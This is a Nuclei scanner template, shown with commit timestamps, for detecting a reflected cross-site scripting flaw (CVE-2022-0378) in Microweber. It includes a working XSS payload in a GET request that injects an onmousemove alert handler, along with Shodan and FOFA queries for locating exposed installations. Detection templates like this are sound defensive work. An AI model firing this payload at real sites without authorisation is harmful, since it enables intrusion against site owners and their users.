nuclei-templates/http/cves/2022/CVE-2022-0378.yaml

51 lines
1.9 KiB
YAML
Raw Normal View History

2022-02-06 05:41:20 +00:00
id: CVE-2022-0378
info:
name: Microweber Cross-Site Scripting
2022-02-06 05:41:20 +00:00
author: pikpikcu
severity: medium
description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest security patch or upgrade to a version that has addressed the vulnerability.
2022-02-06 05:41:20 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0378
- https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce
- https://huntr.dev/bounties/529b65c0-5be7-49d4-9419-f905b8153d31
- https://github.com/vohvelikissa/bugbouncing
- https://github.com/x86trace/Oneliners
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-0378
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.001
2024-05-31 19:23:20 +00:00
epss-percentile: 0.41295
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: microweber
product: microweber
2023-09-06 11:59:08 +00:00
shodan-query: http.favicon.hash:780351152
2024-05-31 19:23:20 +00:00
fofa-query: body="microweber"
2024-01-14 09:21:50 +00:00
tags: cve2022,cve,microweber,xss,huntr
2022-02-06 05:41:20 +00:00
http:
2022-02-06 05:41:20 +00:00
- method: GET
path:
2022-02-06 18:29:47 +00:00
- '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x'
2022-02-06 05:41:20 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-02-06 18:29:47 +00:00
- 'mwui_init'
2022-02-06 05:41:20 +00:00
- 'onmousemove="alert(document.domain)'
condition: and
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022007b6e8a40d0f6e3870e036d67724fb0fd08cfb74510615437a45350d356e17b0022100c9199fa07b53fc012be43bf8c94b4a8caa190a241e907da5e1f265d86ac41aa8:922c64590222798bb761d5b6d8e72950